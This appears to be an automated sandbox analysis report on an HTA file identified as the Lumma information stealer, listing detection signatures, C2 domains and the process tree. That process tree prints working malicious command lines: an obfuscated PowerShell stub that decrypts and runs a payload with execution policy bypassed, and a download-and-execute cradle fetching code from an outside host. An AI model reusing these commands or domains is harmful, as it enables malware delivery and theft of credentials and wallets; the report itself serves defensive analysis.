Windows Analysis Report
re5.mp4.hta
Overview
General Information
Detection
LummaC
Score | Range | Whitelisted | Confidence |
---|---|---|---|
100 | 0 - 100 | false | 100% |
Signatures
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Powershell Download and Execute IEX
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
Yara detected Powershell download and execute
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into foreign processes
Loading BitLocker PowerShell Module
LummaC encrypted strings found
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Download and Execute Pattern
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Yara detected Costura Assembly Loader
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- mshta.exe (PID: 764 cmdline: mshta.exe "C:\Users\user\Desktop\re5.mp4.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
- powershell.exe (PID: 4524 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function RofJg($zkfZU){return -split ($zkfZU -replace '..', '0x$& ')};$xHKo = RofJg('ADDABD852CBF669FB61EACB84993EA3F154802630095EC46064205C3E258CA0A3F846939344DFEADF3B7AC1A3089265AAEECAAD45D0357AA9B08B6C103541454A7CFA4167A71B0010AA6E212385CA641B99658282EE9B9F894A6F9BE882279D7E4F19BDCA0261AA79FC5FAD99FB022F746001AACC2A62050F3C5F1ACB5DBCECEECFE3A7A31A8937A5F65851F4C54937EAC4F795E298C9214224843FB4F9B13B0ABEA024CF9052242B65816163BD511BDD6A30B7FD935D931026CD618E7CF54E77A0A14C23FC0A2197A0626BCCD85128A5B13D7573F97FA06919B49E60B6F135A7B0087E73BEDF1BBD8EF749346E35BB5B8EF328AB42653A8C423CCE65ED751D8FDB7538347B1115C64B27CB0B663FD5D314EF76EA571A266B7DA4A5FEDC4A11881B74E43E450CB442B4DCF5E7F4D3F964B91DD28FD3C9CC2CA269708977893826BC4F817CA3F24A1E25FD45FEE31E6F57DD231764A7ED8EC4F27A85D3E63955F8A0D8233AF72C4E3B87AC790739B96882AAE6D9C087FDE0339006489DE3CCC111FF2BE081EFD92E3486DC8FA48F7C64E97265982A18F79B58A14B1B7F4E618D3E23C9A3C802554F05AB3FACFC592E6C0A13C4FCD3AC9EB67201312B305EABAA5BD1661FB4D01209CD8147427069DCB7C70B3FC1669E3D643A74B2F009A73FF4ECAF1E92FB68F73506E4E251F8603CB128405A12B13D51EB28D67D152254C24F1B1B1B208470E50C7C6A293ED2B9BC672E7167C873D379DDA70928E34D5D92B01E6FBEF93CFF4C5A2A47FEC851643D38DAC71CC97DE03EF89C84EC82B4DAEC32416113C18A4F97176E6C6F19529DFC27FEDF76EAECC83B65CDB18F573A47CA511ABB57C0E2FB271F43F876C7E4EBB670821DEE11F27961708ECC5A51060AB343764D0D66A8F570DE51685313E5643F216ABA89A781C9437C8360BDD168A4F24CC7EEDBAF8CB939B2CD236895145BEE8327E515C72C6E3F8945F6B99DD6856D6B85A39A9636EF180D230B26C5E84DE8C40A71AE0F1B4C4B3ABEE23B5B26FF40AC1D252C89C4C40A58E6456EBA4F5FBFC23');$Hubqy=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((RofJg('446D676A575941436563554774726D56')),[byte[]]::new(16)).TransformFinalBlock($xHKo,0,$xHKo.Length)); & $Hubqy.Substring(0,3) $Hubqy.Substring(129) MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- conhost.exe (PID: 6432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 616 cmdline: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command & {IEX ((New-Object Net.WebClient).DownloadString('https://t1.awagama2.org/Scheele.pt'))} MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- conhost.exe (PID: 6648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 3836 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- powershell.exe (PID: 6388 cmdline: powershell -exec bypass MZP MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- conhost.exe (PID: 6160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Lumma Stealer, LummaC2 Stealer | Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. | No Attribution | | |
{"C2 url": ["appliacnesot.buzz", "scentniej.buzz", "inherineau.buzz", "screwamusresz.buzz", "hummskitnj.buzz", "rebuildeso.buzz", "prisonyfork.buzz", "cashfuzysao.buzz", "permissiblene.click"], "Build id": "yJaNLj--re5"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
| | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security | |
| | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security | |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
| | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | |
| | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | |
| | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen | |
| | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | |
| | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen | |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
| | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
| | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | |
| | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems) |